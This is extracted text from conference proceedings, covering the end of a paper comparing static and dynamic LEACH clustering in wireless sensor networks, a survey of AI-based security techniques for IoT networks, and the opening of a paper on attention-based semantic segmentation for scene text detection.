where Er (ni ) is the residual energy of node ni and dBS (ni ) is the distance between node ni and base station. Each node broadcasts its Vcch and id of its cluster and receive the Vcch from their neighbors. The node with the largest value will be the CH for round 0. since the nodes have the same Energy at the beginning (homogeneous network) so the CH will be the closest node to the base station. Energy consumed in the phase for choosing the CH in r0 can be giving by the following equations: etx (mcch , d) = mcch ∗ Eelec + f s ∗ d2

(18)

erx (mcch ) = M ∗ (mcch ∗ Eelec )

(19)

344

E. I. Nezha and N. Abdellah

With mcch is a message contains the value of Vcch and id of a cluster (Cj ). To eliminate unnecessary communication between the nodes the basic value for choice the CH will be sent with the data in the same packet .and the current CH that will be chosen the CH for next round based on the Vcch values of its members received with the data. with this way the nodes do not need to communicate to choose the CH.

5

Experiments and Results

In the section we present the simulation results in which we evaluate the performance of SC and DC. We use MATLAB simulator to implement the approaches. Through this implementation, we compare the DC and SC protocols. since LEACH is the first algorithm based on clustering we compare leach-dynamic and leach-static to check the efficiency of each on based on the energy consumed during the operation of the network and the number of packets transmitted to the base station. The performance is measured by the following metrics: 1. Live nodes during rounds. 2. Energy consumption. 3. Packets sent to the base station. For the simulations a network model is used with the following proprieties. The nodes are believed to be stationary. We assume that all nodes have the same energy level. The sensor nodes are distributed randomly. And the BS is in the middle of the area of interest. The parameters used in the simulation experiments are described in the following table: Table 1. Simulation parameters Parameter

Value

Initial energy

0.5J

Data size

4000bits

The size of the information message 16bits

5.1

Network field

100m2

Number of nodes

100

Base station location

(50, 50)

Eelec

50nJ/bit

f s

10pJ/bit/m2

amp

0.0013pJ/bit/m4

Comparison of Network Lifetime

Among the important issues in the design of routing protocols for wireless sensor networks is the maximization of network lifetime. In this work, the evaluation of network lifetime is based on the number of live nodes. Figure 3 show the number of live nodes as a function of rounds for the LEACH-DC and LEACHSC clustering algorithms. We can see that the LEACH-SC extends the life of the network by delaying the death of nodes. As noticed in Fig. 9 the last dead Node on the LEACH-SC is in the round 1400 but in the LEACH-DC is on round 1300.

Performance Analysis of Static and Dynamic Clustering

5.2

345

Comparison of the Energy Consumption.

Figure 4 present the total energy consumed over time in the Static and Dynamic clustering approaches. We can see that the energy consumed in static clustering is less than in dynamic clustering because the communication between the nodes to form the clusters in the CD also consumes energy.

Fig. 3. The network lifetime for Dynamic and Static Clustering approaches.

Fig. 4. Energy consumed over time.

346

5.3

E. I. Nezha and N. Abdellah

Comparison of the Data Received by the Base Station

Figure 5 show the number of Parquet received by the base station over time. We notice that the LEACH-SC achieved better results compared to the LEACH-DC.

Fig. 5. The number of Parquet received by the base station over time.

6

Conclusion

In the paper we evaluate the performance of Dynamic clustering and Static clustering for the WSN. We based on the LEACH protocol to validate the results simulation. According to simulation results we can conclude that the Static Clustering is more efficient that Dynamic clustering According to simulation results we can conclude that the LEACH-Static Clustering is more efficient that LEACH-Dynamic clustering in terms of the network lifetime, energy consumption and Parquet received by BS. Then, to have better results from our research, we plan to apply the static Clustering in a Machine Learning algorithms in our future work to compare our algorithm with other recent algorithms in the field.

References 1. Wang, J., Gao, Y., Wang, K., Sangaiah, A.K., Lim, S.-J.: An affinity propagationbased self-adaptive clustering method for wireless sensor networks. Sensors 19(11), 2579 (2019) 2. Wang, J., Gao, Y., Liu, W., Sangaiah, A.K., Kim, H.-J.: Energy efficient routing algorithm with mobile sink support for wireless sensor networks. Sensors 19(7), 1494 (2019)

Performance Analysis of Static and Dynamic Clustering

347

3. El Aalaoui, A., Hajraoui, A.: Energy efficiency of organized cluster election method in wireless sensor networks. Indonesian J. Electr. Eng. Comput. Sci. 18(1), 218–226 (2020) 4. Jafarizadeh, V., Keshavarzi, A., Derikvand, T.: Efficient cluster head selection using ˜ Bayes classifier for wireless sensor networks. Wireless Netw. 23(3), 779–785 NaAve (2017) 5. Singh, J., Yadav, S.S., Vinay Kanungo, Y., Pal, V.: A node overhaul scheme for energy efficient clustering in wireless sensor networks. IEEE Sens. Lett. 5(4), 1–4 (2021) 6. Santhosh Kumar, S.V.N., Palanichamy, Y., Selvi, M., Ganapathy, S., Kannan, A., Perumal, S.P.: Energy efficient secured means based unequal fuzzy clustering algorithm for efficient reprogramming in wireless sensor networks. Wireless Netw. 27(6), 3873–3894 (2021) 7. El Idrissi, N., Najid, A., El Alami, H.: New routing technique to enhance energy efficiency and maximize lifetime of the network in WSNs. Int. J. Wireless Netw. Broadband Technol. 9(2), 81–93 (2020) 8. Thangaramya, K., et al.: Energy aware cluster and neuro-fuzzy based routing algorithm for wireless sensor networks in IoT. Comput. Netw. 151, 211–223 (2019) 9. El Idrissi, N., Abdellah, N., El Alami, H.: Energy-aware clustering and efficient cluster head selection. Int. J. Smart Sens. Intell. Syst. 14(1), 1–15 (2021)

A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things Adnan El Ahmadi1(B) , Otman Abdoun2 , and El Khatir Haimoudi1 1 Polydisciplinary Faculty, Abdelmalek Essaadi University, Larache, Morocco

[email protected] 2 Computer Science Department, Faculty of Sciences, Abdelmalek Essaadi University, Tétouan,

Morocco

Abstract. The explosive rate of the evolution of IoT leads to a demand for nodes and data security. IoT nodes are vulnerable to a variety of critical attacks and security threats because of the heterogeneity of standards and data handled by these nodes. However, nodes and data security are critical challenges for researchers. Thus, we need to explore a solution that responds to various critical challenges in the IoT networks and improves its Quality of Service (QoS). Traditional IoT security technologies are insufficient to meet the security challenges that have recently flourished with diverse types of attacks and threats. Consequently, Integrating AI-based security methods and techniques becomes a necessity because it ensures a better detection and efficient countermeasures toward IoT attacks and threats. In this study, we survey the arisen security challenges in IoT Networks. Moreover, this study conducts a multi-layered investigation of IoT security threats and how AI-based security models intelligently protect IoT devices from various attacks and security threats. Finally, we discuss open challenges and upcoming research directions for secure IoT networks. Keywords: Internet of things (IoT) · Artificial Intelligence (AI) · Quality of Service (QoS) · Cybersecurity

1 Introduction Because of the advances in technology, the number of smart and connected devices has risen at an exponential rate. The adoption of the Internet of Things by individuals and organizations is feasible due to the cheap price of sensors and an estimated 75 billion connected devices will be reached by the year 2025 [1]. Therefore, it is a big challenge to safely process and manage the data generated by interconnected devices when deploying an IoT system. In terms of automation and performance, current and future IoT applications and services have enormous potential to improve the quality of life. Related to the IoT, multiple types of cyber-attacks and threats are shown challenging problems in the expansion of IoT [2]. Securing applications and devices is the most basic necessity in an IoT network. With the growth of IoT, various security issues are shown as potential threats. Without © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 348–358, 2023. https://doi.org/10.1007/978-3-031-35251-5_34

A Comprehensive Study of Integrating AI-Based Security Techniques

349

a trustworthy system, emerging IoT applications will fail to fulfil the needs of people and society. Typically, IoT systems operate at multiple layers, each layer has a unique set of tasks and associated technologies that need to be performed in an IoT application, and each layer introduces a new set of issues and security risks. For instance, denial of service (DoS) attacks, spoofing attacks, jamming, eavesdropping, data tampering, a man in the middle attacks, etc. are the most frequent IoT attacks [3]. Some potential IoT security solutions could be useful depending on each security threat, such as authentication, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), access control, malware analysis, etc. [4]. Traditional response techniques have deficient performance accuracy due to the high prevalence of security threats and attacks. Artificial intelligence (AI) algorithms can train machines to predict threats or risks at an early stage, or to detect anomalies in Internet of Things (IoT) networks. It provides a robust solution that is regularly updated and can easily detect anomalies and undesirable activities [5]. The main contributions of the current study are as follows: – This study focuses on understanding AI-based IoT security solutions and their efficiency against malicious activities in the IoT. – We discuss various challenging IoT security issues at different layers to highlight the aim of this study. – We present useful architectures and techniques in intelligent security modeling to address security issues in IoT environments. – Finally, we examine the problems encountered and potential research opportunities and future directions to secure IoT networks and systems. The remainder of this work is structured as follows. Section 2 present a brief view concerning the related works to this comprehensive study. Section 3 presents the definition of IoT network, its architecture, its challenges, and the security threats. Section 4 introduces AI-based Methods for IoT Security. Section 5 is consecrated for discussing the open challenges and future works.

2 Related Works In recent years, researchers have conducted several studies on IoT security to provide a clear view of future work. By taking advantage of the heterogeneity of IoT networks, attackers may generate dynamic threats attempting to seize control of communications or physical devices. We present in this section the review of some IoT security reviews. Ali et al. [6] presented research of IoT security issues and classified potential cyberattacks on each IoT architecture layer. They explored challenges to traditional security solutions such cryptographic solutions (Symmetric/Asymmetric encryption algorithms), authentication procedures, and key management in the IoT.

350

A. E. Ahmadi et al.

The authors in [7] provided a classification of recent research that investigates various Machine Learning (ML) and Deep Learning (DL) strategies for IoT security. They included a taxonomy based on IoT vulnerabilities, corresponding attackers and impacts, threats that exploit weakness of links, effective solutions, and organizational authentication technologies that can identify and track such weaknesses. In [8], the authors investigated the security plan for Internet of Things systems and discussed IoT security solutions based on ML techniques such like supervised learning, unsupervised learning, and Reinforcement Learning (RL). This paper focuses on ML-based IoT authentication, access control, secure offloading, and malware detection approaches to preserve data privacy. The study [9] analyzed a variety of threats that have a higher chance of assaulting IoT, as well as machine learning techniques aiming to counter them. While the authors of [10] studied in full the numerous layer-based vulnerabilities that exist in the Internet of Things, specifically the primary security issue CIA (Confidentially, Integrity, Availability). The authors also investigated systematically the three advanced technologies ML, AI, and Blockchain for resolving the IoT security issue. The authors in [11] explored several IoT data sources and classified them into four groups. They also evaluated the existing ML-based solutions that aim to preserve privacy in IoT. The authors of [12] analyzed the specificity and complexity of IoT security protection before concluding that AI approaches can bring new potent capabilities to meet the IoT’s security requirements. They evaluated the technical viability of AI in resolving IoT security issues and outlined a basic process for AI-based IoT security solutions. Taking the example of four serious IoT security threats, namely device authentication, DoS and DDoS attacks, intrusion detection, and malware detection, the authors highlighted AIbased solutions and examined their efficiency against these threats. In [13], the authors examined six ML approaches for their ability to detect MQTTbased attacks. They assessed features at three abstraction levels: packet-based, unidirectional flow, and bidirectional flow. They developed a simulated MQTT data set for training and evaluation purposes. Table 1 summarizes the discussed issues and the countermeasures of IoT systems in existing works.

A Comprehensive Study of Integrating AI-Based Security Techniques

351

Table 1. Discussed issues and countermeasures of IoT systems. Reference

Year

Discussed Issues

Security Algorithms and Techniques

Ali et al. [6]

2019

Layer-wise security attacks Symmetric / Asymmetric encryption algorithms

Ahanger et al. [7]

2022

Protocol-wise and layer-wise security attacks

ML and DL algorithms

Xiao et al. [8]

2018

Addressed various threats

ML algorithms

Gupta et al. [9]

2020

Categorized IoT attacks based on goal, performer, and layered

ML-based solutions for DoS, MITM and selective forwarding attacks

Mohanta et al. [10]

2020

Several types of IoT attacks ML, AI and Blockchain technologies

Amiri-Zarandi et al. [11]

2020

Layer-wise data sources of ML algorithms to preserve IoT Networks privacy

Hindy et al. [13]

2020

Addressed IDS Security

ML algorithms

Wu et al. [12]

2020

Analyzed a variety of security threats

ML algorithms

Table 2. Brief description of perception layer security threats. Threat/Attacks

Description

Jamming

Creates noise signals in same communication channel

Spoofing

Send unauthorized packets into network

Sleep denial

Lose the power or alter the sleep routine of IoT devices

Fake node

Unauthorized node is placed on the network

Data tempering

Destroy or alter sensitive information

3 Overview of the Internet of Things (IoT) and Security Threats 3.1 IoT Overview Internet of Things (IoT) refers to the network of physical objects having integrated with interoperable communication technologies leading to do some services. There are many domains in which the IoT can play a remarkable role in our daily lives [14, 15]. Figure 1 gives a representative list of some of the domains that make up the Internet of Things (Tables 2, 3 and 4).

352

A. E. Ahmadi et al. Table 3. Brief description of network layer security threats.

Threat/Attacks

Description

DoS and DDoS

Sends overwhelming messages to the network

Eavesdropping

Access private communication to steal information

Wormhole / Sinkhole / Rank

Modify packet routes, flow speed, rank of the nodes

Sybil

A single malicious node uses multiple identities

Hello flood

Sends hello request to makes a node unavailable

Routing Attack

Manipulate RPL-based networks status

Man in the Middle Attack

Eavesdrops and changes the communication

Table 4. Brief description of application layer security threats. Threat/Attacks

Description

Browser based

Hampered or stealing the significant data

Phishing

Send fake links, emails, or messages to deceive

MQTT based

Target MQTT protocol to reduce the data transfer performance

Malicious code injection

Injects unauthorized code or data segment

Fig. 1. Emerging fields of the IoT

The Internet of Things connects many heterogeneous objects where a layered architecture is necessary [16]. According to [17], there is no standard architecture to be a reference model although there are plenty of proposed models. Among the proposed

A Comprehensive Study of Integrating AI-Based Security Techniques

353

models, the basic model is composed of three layers: Application, Network, and Perception Layers. Recently, many other models have been proposed in the literature enabling more abstraction to the IoT architecture as illustrated in Fig. 2.

Fig. 2. The IoT Architecture a) Three-layer. (b) Middle-ware based. (c) SOA based. (d) Five-layer.

A three-layer architecture is the standard and most widely recognized structure. It was initially employed at the early age of IoT networks. There are three layers indicated: perception, network, and application. – Perception layer. It is the physical layer that contains ambient information sensors. Some environmental or physical factors are detected, or other intelligent objects are distinguished [18]. – Network layer. It connects intelligent gadgets, network devices, and servers to one another. Its capabilities are also used to transmit and process sensor data [18]. – Application layer. It delivered specific application services to the user. It describes various Internet of Things applications, such as smart homes, smart cities, and intelligent health [18]. 3.2 Challenges of the Emerging IoT Networks Recently, the emerging IoT networks introduce multiple challenges that the current models cannot deal with appropriately. Among these challenges: – Stringent latency requirements. Many control systems often require short end-toend latencies between the sensor and the control node. Other IoT application, such as emergency, demand a latency below milliseconds. – Network bandwidth constraints. The high number of connected things produces an important volume of data. For example, a connected vehicle can create tens of

354

A. E. Ahmadi et al.

megabytes per second. It includes the vehicle conditions, the surrounding environment, the traffic density, and videos recorded by the vehicle. Sending all the data generated by connected objects requires a high network bandwidth. – Resource-constrained devices. Many IoT devices have limited resources namely computing power, energy, bandwidth, and storage. Due to their limited resources, many devices are not able to fulfill all their needs. – New security challenges. An adequate and a new security behavior must be applied to the physical devices and network routing schemes to address many challenges in the emerging IoT networks. For instance, the increasing number of connected devices implies a growing challenge to keep the security credentials up to date on each device. Moreover, many resource-constrained devices in the IoT will not have sufficient resources to protect themselves. The classical security paradigm may not be suitable to deal with these new challenges. 3.3 Security Threats in IoT Networks Based on the challenges mentioned above, we present many security concerns at different layers, notably the perception, network, middleware, and application; layers of IoT architecture and systems. – Perception layer security issues: – Network layer security issues: – Application layer security issues: Figure 3 illustrates a summary of the layer-wise security threats in IoT architecture which must be intelligently addressed for safeguarded IoT applications and services.

Fig. 3. Various security threats at different layers in IoT architecture.

A Comprehensive Study of Integrating AI-Based Security Techniques

355

Table 5 presents the impact of the attacks, mentioned above, to internet of things regarding on their damages and destruction of network. Table 5. Categorization of security threats/attacks regarding their impact. Threat/Attacks

Perception layer Network layer Application layer Impact

Jamming

Yes





Medium

Spoofing

Yes





High

Sleep denial

Yes





High

Fake node

Yes





High

Data tempering

Yes





Medium

DoS and DDoS



Yes



High

Eavesdropping



Yes



Low

Wormhole / Sinkhole / Rank –

Yes



Medium

Sybil

Yes



High



Hello flood



Yes



Routing Attack



Yes



High

Man in the Middle Attack



Yes



Medium

Browser based





Yes

Medium

Phishing





Yes

Medium

MQTT based





Yes

High

Malicious code injection

Yes



Yes

High

4 AI-Based Methods for IoT Security 4.1 Machine Learning Methods. • Supervised Approaches • Support Vector Machine (SVM). SVM creates splitting hyperplane among various class data to classify the given samples. • Naive Bayes (NB). Find the posterior probability of an event based on the given information to classify the abnormality of a network. • K-nearest neighbor (K-NN). Classifies data or device characteristics in terms of malicious activity based on the nominated nearest neighbor’s votes. • Decision Tree (DT). It is a predictive model which uses a decision tree to observe and reach in the conclusion. • Random Forest.Tree based Supervised ensemble learning model which construct a multitude of DT to predict the output.

356

A. E. Ahmadi et al.

• Ensemble Learning (EL). It combines multiple base ML models to provide better prediction performance. • Unsupervised Approaches • K-Means. In this algorithm, a data set is classified into clusters. Initially, k-arbitrary centroids are selected at random. Then, the nodes are grouped into clusters of nearby centroids. The algorithm is responsible for recalculating centroids using the average of a cluster’s nodes. This procedure is repeated until all nodes have been grouped into clusters. • Principal Component Analysis (PCA) is the process of computing the principal components and using them to perform a change of basis on the data, sometimes using only the first few principal components and ignoring the rest. • Deep Learning Methods • Supervised Approaches • Convolutional Neural Network (CNN). Reduces the connection between layers and combines convolutional layer with pooling layer to deteriorate training complexity. • Recurrent Neural Network (RNN). Works on graph-like structure to detect malicious data in time-series based threats • Unsupervised Approaches • A restricted Boltzmann machine (RBM) is a generative stochastic artificial neural network that can learn a probability distribution over its set of inputs. • An autoencoder (AE) is a type of artificial neural network used to learn efficient coding of unlabeled data. • Deep Belief Network (DBN) is a generative graphical model, or alternatively a class of deep neural network, composed of multiple layers of latent variables, with connections between the layers but not between units within each layer. • Semi-supervised Approaches • Generative Adversarial Networks (GANs) are a model architecture for training a generative model, and it is most common to use deep learning models in this architecture.

5 Open Challenges and Future Research Opportunities In this section, we will discuss challenges in identifying threats to IoT security and AIbased countermeasure research. In addition, we will give several solutions for addressing these obstacles for use in future research in terms of several metrics, namely cybersecurity, latency, real-time detection, data scarcity and Energy efficiency and secure network (Fig. 4). – Cybersecurity threats. An exploited IoT node could have catastrophic repercussions on critical applications such as the smart grid and healthcare. Providing node security is one of the greatest research obstacles. If a ML model is employed to secure IoT nodes, the model may utilize a fraction of node-generated data. – Latency. Real-time IoT applications (such as autonomous vehicles, healthcare, banking and supply chain, online banking, etc.) leverage unlimited training data to develop a deterministic ML model. Real-time IoT systems are often stochastic and random; hence, the existing models are not relevant to real-time applications.

A Comprehensive Study of Integrating AI-Based Security Techniques

357

Fig. 4. AI-techniques for IoT Security

– Real-time detection. Big data analytics can study an organization’s event logs to identify dangers and prevent assaults. There is potential for establishing a framework for huge data analysis to identify context-aware attacks in real time. The AI-based threat model is intended to assess vast amounts of incoming data in real time, detect a threat, and initiate a quick response. – Data scarcity. AI-based techniques are data-driven, necessitating a vast quantity of real-world data sets. This large volume of data is separated into training and testing datasets. However, the generation of such huge volume of clean and noiseless data samples is still a challenge. – Energy efficiency and secure network. The IoT requires a balance between security and energy consumption. Security can be costly, both directly in terms of software and hardware expenditures and indirectly in terms of energy usage. Minimal energy consumption and minimal maintenance costs are required for the numerous industrial IoT applications that employ a high number of connected sensors in inaccessible locations.

6 Conclusion The security and privacy problems of IoT are crucial since IoT technology has become an increasingly pervasive component of our daily lives. Due to the heterogeneity of IoT networks, security and privacy concerns could be compromised. IoT security issues can be defended against using AI approaches. Integrating distributed learning strategies eliminate the need for a central control board. There are currently no relevant datasets for MLbased and DL-based security systems, making it difficult to evaluate their effectiveness in practice. We have highlighted in this comprehensive study the IoT’s security concerns, attacks, and security requirements. We examined some AI-based techniques that might ensure security measures and indicated open issues and future research opportunities.

358

A. E. Ahmadi et al.

References 1. Yunana, K., Alfa, A.A., Misra, S., Damasevicius, R., Maskeliunas, R., Oluranti, J.: Internet of Things: applications, adoptions and components - a conceptual overview BT - Hybrid Intelligent Systems, pp. 494–504 (2021) 2. Razzaq, M.A., Gill, S.H., Qureshi, M.A., Ullah, S.: Security issues in the Internet of Things (IoT): a comprehensive study. Int. J. Adv. Comput. Sci. Appl. 8(6), 383 (2017) 3. Tahsien, S.M., Karimipour, H., Spachos, P.: Machine learning based solutions for security of Internet of Things (IoT): A survey. J. Netw. Comput. Appl. 161, 102630 (2020) 4. Hassija, V., Chamola, V., Saxena, V., Jain, D., Goyal, P., Sikdar, B.: A survey on IoT security: application areas, security threats, and solution architectures. IEEE Access 7, 82721–82743 (2019) 5. Fraga-Lamas, P., Fernández-Caramés, T.M., Suárez-Albela, M., Castedo, L., GonzálezLópez, M.: A review on internet of things for defense and public safety. Sensors (Basel) 16(10), 1644 (2016). https://doi.org/10.3390/s16101644 6. Ali, I., Sabir, S., Ullah, Z.: Internet of things security, device authentication and access control: a review. arXiv Prepr. arXiv1901.07309 (2019) 7. Ahanger, T.A., Aljumah, A., Atiquzzaman, M.: State-of-the-art survey of artificial intelligent techniques for IoT security. Comput. Networks 206, 108771 (2022). https://doi.org/10.1016/ j.comnet.2022.108771 8. Xiao, L., Wan, X., Lu, X., Zhang, Y., Wu, D.: IoT security techniques based on machine learning: how do IoT devices use AI to enhance security? IEEE Signal Process. Mag. 35(5), 41–49 (2018) 9. Gupta, S., Vyas, S., Sharma, K.P.: A survey on security for IoT via machine learning. In: 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA), pp. 1–5 (2020) 10. Mohanta, B.K., Jena, D., Satapathy, U., Patnaik, S.: Survey on IoT security: challenges and solution using machine learning, artificial intelligence and blockchain technology. Internet Things 11, 100227 (2020). https://doi.org/10.1016/J.IOT.2020.100227 11. Amiri-Zarandi, M., Dara, R.A., Fraser, E.: A survey of machine learning-based solutions to protect privacy in the Internet of Things. Comput. Secur. 96, 101921 (2020). https://doi.org/ 10.1016/j.cose.2020.101921 12. Wu, H., Han, H., Wang, X., Sun, S.: Research on artificial intelligence enhancing internet of things security: a survey. Ieee Access 8, 153826–153848 (2020) 13. Hindy, H., Bayne, E., Bures, M., Atkinson, R., Tachtatzis, C., Bellekens, X.: Machine learning based IoT intrusion detection system: an MQTT case study (MQTT-IoT-IDS2020 dataset). In: International Networking Conference, pp. 73–84 (2020) 14. Sara, B., Otman, A.: New learning approach for unsupervised neural networks model with application to agriculture field. Int. J. Adv. Comput. Sci. Appl., 11(5) (2020) 15. Chaymae, T., Elkhatir, H., Otman, A.: Recent advances in machine learning and deep learning in vehicular ad-hoc networks: a comparative study BT. In: The Proceedings of the International Conference on Electrical Systems & Automation, pp. 1–14 (2022) 16. Al-Fuqaha, A., Guizani, M., Mohammadi, M., Aledhari, M., Ayyash, M.: Internet of things: a survey on enabling technologies, protocols, and applications. IEEE Commun. Surv. tutorials 17(4), 2347–2376 (2015) 17. Krˇco, S., Pokri´c, B., Carrez, F.: Designing IoT architecture (s): a European perspective. In: 2014 IEEE world forum on internet of things (WF-IoT), pp. 79–84 (2014) 18. Jabraeil Jamali, M.A., Bahrami, B., Heidari, A., Allahverdizadeh, P., Norouzi, F.: IoT Architecture BT - towards the internet of things: architectures, security, and applications, pp. 9–31. Springer, Cham (2020)

Semantic Segmentation Architecture for Text Detection with an Attention Module Soufiane Naim(B) and Noureddine Moumkine Mathematical Computer Science and Applications Laboratory, Mohammedia, Morocco [email protected], [email protected]

Abstract. Scene text detection is a very challenging problem due to its variability in size, font, color and orientation. The trend of research is to create models which detect bounding box coordinates around text areas inside an image. However, in this work we try to address this problem in a semantic segmentation way by creating masks to highlight these zones. Our model is a fully convolutional network, inspired by the UNet architecture. It is a pixel-wise classification framework which outputs a prediction map having the same width and height of the input image. Pixels inside this map are labeled either belonging or not to a text area. To increase our model performance, we make use of transposed convolution to upsample the feature maps in the decoder part. We add an attention module to our architecture in order to recalibrate channels-wise features which help us to increase the overall performance by 1%. We also propose to use the intersection over union loss to solve the imbalance problem since text generally occupies a very small amount of pixels inside images. We conduct the train and test experiments on the ICDAR 2015 dataset. Our model reaches a MeanIoU score of 44.20%. Keywords: Fully connected network · Scene text detection · Semantic segmentation · Text multi-oriented · Attention Bloc · Transposed Convolution

1 Introduction Nowadays, text exists everywhere. Creating a system that detects it and extracts its content is an operation of great importance, since it will facilitate several tasks in human life. Thus, such a system could be used by a tourist to capture text written in an unknown language in order to translate it, or to build autonomous cars capable of using text to guide the driver to his destination, etc. Nevertheless, detecting the text in an image taken in open spaces does not seem to be an easy task. The taken image may suffer from occlusion, saturation, glare, fading, etc [16, 17]. Sometimes it is the background that takes forms looking like certain characters, a thing which makes it difficult to distinguish it from a real text. It should also be noted that text in a natural scene image is not always presented in a horizontal orientation. It can also exist in a vertical, inclined or curvature orientations. The size of the text is another factor that makes the detection harder. An image can © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 359–367, 2023. https://doi.org/10.1007/978-3-031-35251-5_35

360

S. Naim and N. Moumkine

cohabit large text which will be easy to detect and very small text which will be difficult to identify. The surface occupied by text in an image also varies. Sometimes it is represented by a large amount of pixels. At other times, when the text has a very small size, this proportion becomes very low leading to a minor representation. Therefore, this situation leads to an unbalanced representation. The scene text detection has been the subject of many research papers. The early ones are based on hand crafting methods [9, 18, 19] which try to capture text properties such as texture or shape to highlight text regions. The great progress in this field is due to deep learning techniques, specially the artificial neural networks (CNN) [15] whose contribution has improved the quality of extraction. The deep learning methods[10, 20, 21] try to capture useful features within an image by using intensive data training. These methods show better accuracy and efficient performance. The contributions of our paper are as follows. 1-an efficient framework is proposed to detect text within a natural scene image in any orientation. Our proposed model is to output a semantic segmentation map where pixels are labeled as belonging or not belonging to a text area. 2-An attention module is used to improve the detection performance. The attention mechanism is known by its ability to focus only on pixels that could describe objects within an image. Here we use an attention module that works upon the channel dimension to ensure an exchange of useful information between them.

2 Related Works Early research in the field of text detection and recognition has been based on handcrafting methods. The goal is to discriminate features of text area within an image. These methods can be divided into two main streams: a/ Connected component-based methods [1–3] which extract areas likely to contain text using segmentation techniques, then eliminate negative regions by using low-level features (stroke width, texture, etc). b/ Sliding window-based methods [4–6] Several windows of different sizes are used to scan the whole image. The regions covered by these windows will be classified thereafter according to the presence or not of the text. These different methods have made it possible to obtain correct results. The great progress in the field is due to the advent of Deep learning techniques and the use of artificial neural networks (CNN). Yao et al [7] try to detect text in multi orientations. They use a convolution network to classify each pixel according to whether it belongs or not to a text zone. In addition, the angle of text inclination and the coordinate of bounding box (BB) are also predicted. Zhan et al [8] produce a segmentation map which indicates the regions containing text then it applies MSER [9] to extract candidate characters which will then make it possible to deduce the orientation of the text as well as the coordinates of the Bounding Box (BB). EAST [10] uses a model inspired from the UNet [11] architecture to output a prediction map that specifies whether each pixel it belongs to a text area. Their model also predicts the coordinates of BB under two different shapes: rectangular BB with angle of inclination and the coordinates of the four corners of the quadrilateral overlapping the text. In the rest of this article, we will detail and explain our contribution which consists of the creation of a semantic segmentation map that highlights regions where text is present.

Semantic Segmentation Architecture for Text Detection

361

3 The Proposed Method 3.1 Architecture Our main goal is to create a semantic segmentation model (Fig. 1) for scene text detection. The output of our model is a prediction map where pixels belonging to a text zone are highlighted. Scene images may contain text in any orientation with different fonts and sizes which make the detection very hard. In addition the background may have shapes that look like characters leading to false detections. To deal with such challenges, we propose a fully convolutional neural network (FCN) [23] inspired from the UNet architecture. This one will be associated with transposed convolution and an intention module to improve its accuracy. Our framework can be decomposed into two parts : The first one is the encoder part which receives a natural scene image (w x h x c) as input. The objective here is to capture important features that describe text regions inside the image. At the same time the dimension of each feature map in the encoder should decrease to avoid heavy computation. In our proposed architecture, we use DenseNet [12] as backbone in this stage. The architecture of DenseNet is composed of 4 dense blocks with a growth rate of k = 32. This architecture is well known for its capability to extract more features within an image and avoid the vanishing gradient phenomena from being produced. The second one is the decoder part. It is composed of four blocks, each one receives a feature map as input then it doubles its size by using the Transposed Convolution [22]. The advantage of using this technique is that it allows to increase the size of the input feature map while learning the best parameters to realize this transition. The output of the transposed convolution is concatenated with a layer having the same dimensions (width and height) of the encoder part. Then, an attention block is applied. 3.2 Attention Block Attention is a mechanism that tries to look into an image then focuses only on relieving parts that could help to improve the model performance. In our work, we use the squeeze and excitation [13] (SE) module (Fig. 2) which works on each channel in the feature map to extract relationships between them. In each block of the decoder, the SE module is placed just after the concatenation layer to merge important features that could exist in its channels. In the convolutional neural network the lower layers detect general features(lines, edges, etc) why the upper ones tend to detect complete object (in our case characters composing text areas). The intuition behind SE module is to fuse both information in order to get better representation. The SE module gets as input a convolutional block. It starts by squeezing each of its channels to a single numeric value by using average pooling. Then a fully connected layer with RELU [24] activation is applied to add some nonlinearity. A second fully connected layer is then applied. This layer uses the sigmoid activation function to convert values within the range of 0 and 1. At last each channel of the input convolutional block is weighted based on the output of the SE module.

362

S. Naim and N. Moumkine

3.3 Loss Text in scene images always appears with multiple forms and sizes. The binary cross entropy loss doesn’t seem to work properly in this case. Instead IOU loss is suitable when the size of objects changes tremendously within an image. IOU loss measures the intersection between the predicted and ground truth areas over their union. To facilitate and get better performances, we choose to use it in the training process. Its value is given as : IoU = 1 −

|X ∩ Y | |X ∪ Y |

(1)

where X and Y represent respectively predicted labels and the ground truth ones.

Fig. 1. The architecture of our model. Descriptions of blocks 1 to 4 are detailed in Table 1.

Semantic Segmentation Architecture for Text Detection

363

Table 1. The Descriptions of blocks 1 to 4 of the encoder. Block

Layers

Block 1

3 × 3 max pool, stride 2  1 × 1 conv ×6 3 × 3 conv

Block 2

Block 3

Block 4

1 × 1 conv 2 × 2 Avg pool, stride 2  1 × 1 conv × 12 3 × 3 conv 1 × 1 conv 2 × 2 Avg pool, stride 2  1 × 1 conv × 24 3 × 3 conv 1 × 1 conv 2 × 2 Avg pool, stride 2  1 × 1 conv × 16 3 × 3 conv 1 × 1 conv

Fig. 2. Squeeze and excitation blocks. The picture has been taken from the original article.

4 Experiments To evaluate our model, we train it and test it on the ICDAR 2015 [14] dataset which is composed of 1500 images (1000 images for train and 500 for test). The text into images is word level annotated and has multi orientations. The quality of the images is very low. The training process is executed using the Tesla P100-PCIE GPU with 16GB of RAM. As an optimizer, we use Adam optimizer where beta1 and beta2 are respectively 0.9 and 0.999.

364

S. Naim and N. Moumkine

Fig. 3. Examples of predictions made by our model. On the left the original image, in the center the prediction made by our model and on the right the ground truth masks

5 Results 5.1 Quantitative Results The strength of our work lies in the possibility to use our model as a region proposal network and its output as a feature map, which can be combined later with anchors and a classifier to predict the BB coordinates. Most research papers about scene text detection domain Focus on predicting the BB rectangles surrounding text areas. Unfortunately, due to the lack of research that focuses

Semantic Segmentation Architecture for Text Detection

365

on the creation of semantic segmentation masks over text, we were unable to make a comparative discussion in this section. The proposed method has reached a Mean Intersection over union (MeanIoU) score of 44.20% on the ICDAR 2015 dataset. This result is very promising since text inside images is very hard to detect. To evaluate the impact of using the SE attention module, an ablation study has been conducted. After measuring the performance of the entire model, the training conditions have been fixed. Then, a new model without the SE blocks is trained. Table 2 shows how the SE modules have positively improved the detection performances. With the same conditions, the SE blocks increase the MeanIoU score by 1%. Table 2. Performances of our model with and without SE modules. Method

Mean IoU

Our model with SE blocks

44.20

Our model without SE blocks

43.2

